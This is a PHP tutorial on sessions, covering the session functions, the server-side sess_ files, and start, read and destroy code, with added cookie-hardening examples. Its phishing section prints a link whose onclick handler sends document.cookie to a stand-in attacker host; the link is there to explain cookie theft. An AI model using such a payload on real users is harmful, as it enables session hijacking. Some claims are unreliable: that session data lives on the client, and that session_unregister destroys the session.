php programming

The Internet browser session begins when the user makes the first request for any web page in a website within a browser. PHP has several built-in functions for working with the session, each returning or setting one particular piece of session information:

  • session_name – The current session name.
  • session_id – The session id.
  • session_module_name – The name of the session module.
  • session_save_path – The session save path.
  • session_encode – The contents of the current session in encoded (serialized) format.
  • and several others

A session variable usually has a much smaller lifetime than a PHP cookie or a Flash Cookie, and will live only for the duration of the browser session.

What Happens When the PHP Session is Instantiated?

When a new PHP session is started on the server, a random 32-digit hex number is generated and an empty session file is saved on the server to cache the session information. The name of this file consists of the prefix ‘sess_’ followed by the new session id hex number.

A session cookie carrying this id is created at the same time, allowing the response object to stay in sync with the browser session.

Data inside the session will NOT be available across multiple servers: session data is limited to one browser on one server. To persist data across multiple servers for the same browser session, it is best to make use of PHP cookies or a database table.

If a PHP file has multiple include files, care should be taken that the session was not already started in another include file and that no HTTP header or content (i.e. any output at all) is sent before the session_start() command is issued. Most programmers simply make session_start() the first line of the PHP file to avoid this problem.
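As an added example (not code from the article), the script below shows the start-up sequence just described: it starts the session only when no include file has already done so and no output has been sent, then derives the name of the ‘sess_’ cache file from the save path and the session id. It assumes PHP's default "files" save handler; the userid value is a constructed sample.

```php
<?php
// Added example: start a session safely and locate its server-side cache file.
// It guards against the two mistakes described above: a session that an include
// file already started, and output (HTTP body) sent before the headers.
function startSessionSafely(): bool
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return true;                      // an include file already started it
    }
    if (headers_sent($file, $line)) {
        error_log("Cannot start session: output already sent at $file:$line");
        return false;
    }
    return session_start();
}

// Path of the file PHP uses to cache this session: <save_path>/sess_<id>.
// Assumes the default "files" save handler; other handlers use no such file.
function sessionFilePath(): string
{
    $dir = session_save_path();
    if ($dir === '') {
        $dir = sys_get_temp_dir();        // PHP falls back to the system temp dir
    }
    // save_path may carry a "depth;mode;" prefix (e.g. "2;/tmp"); keep the path
    $parts = explode(';', $dir);
    return rtrim(end($parts), '/') . '/sess_' . session_id();
}

if (startSessionSafely()) {
    $_SESSION['userid'] = 42;             // constructed sample value
    $id   = session_id();
    $path = sessionFilePath();
    session_write_close();                // flush $_SESSION to the sess_ file
    echo "Session id : $id" . PHP_EOL;
    echo "Hex digits : " . (ctype_xdigit($id) ? 'yes' : 'no') . PHP_EOL;
    echo "Cache file : $path (exists: " . (file_exists($path) ? 'yes' : 'no') . ')' . PHP_EOL;
}
```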

It is best to limit session variable names to alphanumeric characters in order to avoid characters, such as spaces or dashes, that are invalid in a variable name.

Start the PHP Session with Code and Read a Session Variable:

<?php
// Start the session (must come before any output)
session_start();
// Write a session variable; session_register() was removed in PHP 5.4,
// so assign directly to the $_SESSION array instead
$userid = 42;                     // constructed sample value
$_SESSION['userid'] = $userid;
// Reference a session variable, but only if it has been set
if (isset($_SESSION['userid'])) {
    $userid = $_SESSION['userid'];
}
?>

Read All Session Variables and Unregister a Single Variable:

<?php
// The session must be started before $_SESSION can be read or changed
session_start();
// print all session variables
print "\nContents of \$_SESSION:\n";
foreach ($_SESSION as $k => $v) {
    print " $k = $v\n";
}
// unregister (remove) single session variables; session_unregister() was
// removed in PHP 5.4, and unset() on $_SESSION is its replacement
unset($_SESSION['userid'], $_SESSION['username']);
?>

Unset All Session Variables and Destroy Session:

<?php
// The session must be active before it can be cleared
session_start();
// unset all session variables
session_unset();
// expire the session cookie in the browser, then destroy the server-side data
setcookie(session_name(), '', time() - 42000, '/');
// destroy session
session_destroy();
?>

A PHP session is not always destroyed on purpose. Some of the reasons that a PHP session may be destroyed are:

  1. The user navigates to a different domain.
  2. The browser is shut down.
  3. If the browser is left inactive for a period of about 24 minutes.
  4. The program issues a session_destroy() command, if this is coded by the programmer.
  5. The program issues a session_unregister() command, which destroys the session.

A phpSessionSheet is available with all source code from this article.

Session variables are easily accessed and readable. For this reason it is best to never place sensitive data in session variables. Session variables also live on the client machine rather than the server. Sensitive data should usually reside in the database and be encrypted with an algorithm which makes use of a key. If any sensitive data is kept on the server, proper server folder security should be employed to protect the files. Generally the session is used for non-sensitive website data which allows navigation and user experience to be more enjoyable and intuitive.

How can a Web User’s Cookie and Session Variables Be Viewed By a Phishing Website?

Cookies cannot be directly viewed by a website. There is, however, an exploit whereby a website can take a snapshot of a web user’s cookies by getting the web user to perform a quick action without thinking. There are many opportunities online where users can be presented with a message containing a link to click on: online bulletin boards, messaging programs, emails, popup advertisements, etc. When a user receives a message, the sender is not recognized, and there is a clickable link in the message, this could be, and probably is, an exploit to get personal information. Here is how it works. The user is presented with a communication containing a link such as:

<a href="#"
   onclick="window.location='http://www.bigbadwolf.com/takeusercookies.cgi?text='+escape(document.cookie); return false;">We have been looking for you.
Click Here to claim your $500,000.00 inheritance!</a>

The presentation, message, and theme will all be geared toward getting the user to click the link very fast; it will usually be stated as a one-time offer, expiring in x number of days, etc. If the user clicks the link, the above script is executed: it reads and saves the user’s personal cookie and session data from their machine and then immediately redirects the user to a page which talks about the original offer. The theft of personal information takes place so fast that it is completely unnoticeable. It is good practice to never click on a link from a company or user that is unknown.
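As an added example on the defensive side (not code from the article), the following configuration marks the session cookie HttpOnly, so the onclick handler above cannot read it through document.cookie, regenerates the id on login, and enforces on the server the inactivity timeout listed earlier (PHP's default of 1440 seconds, about 24 minutes). It assumes PHP 7.3 or later for the array form of session_set_cookie_params(); the user id is a constructed sample.

```php
<?php
// Added example: session hardening that blunts the link-click cookie theft
// described above. An HttpOnly cookie is not exposed through document.cookie,
// so a script running in the page cannot read the session id.
const IDLE_LIMIT = 1440;   // seconds; PHP's default session.gc_maxlifetime

function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,        // browser-session cookie, as described above
        'path'     => '/',
        'secure'   => true,     // only sent over HTTPS
        'httponly' => true,     // hidden from document.cookie
        'samesite' => 'Lax',    // not sent on cross-site subrequests
    ]);
    ini_set('session.use_strict_mode', '1');   // reject ids the server never issued
    ini_set('session.use_only_cookies', '1');  // never accept the id from the URL
}

// Call after a successful login so the pre-login id can no longer be reused.
function loginUser(int $userid): void
{
    session_regenerate_id(true);
    $_SESSION['userid']    = $userid;
    $_SESSION['last_seen'] = time();
}

// Returns true while the session is inside the inactivity window; otherwise
// it destroys the session, enforcing the timeout on the server side.
function sessionStillValid(int $now): bool
{
    if (!isset($_SESSION['userid'], $_SESSION['last_seen'])) {
        return false;
    }
    if ($now - $_SESSION['last_seen'] > IDLE_LIMIT) {
        $_SESSION = [];
        session_destroy();
        return false;
    }
    $_SESSION['last_seen'] = $now;
    return true;
}

configureSessionCookie();
session_start();
loginUser(42);                                       // constructed sample user
var_dump(sessionStillValid(time()));                 // bool(true)
var_dump(sessionStillValid(time() + IDLE_LIMIT + 1)); // bool(false): expired
```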

Session variables in PHP are easy to use, reuse, and discard as long as the rules are followed and some basic precautions taken. They can be another valuable tool in your PHP toolbox.
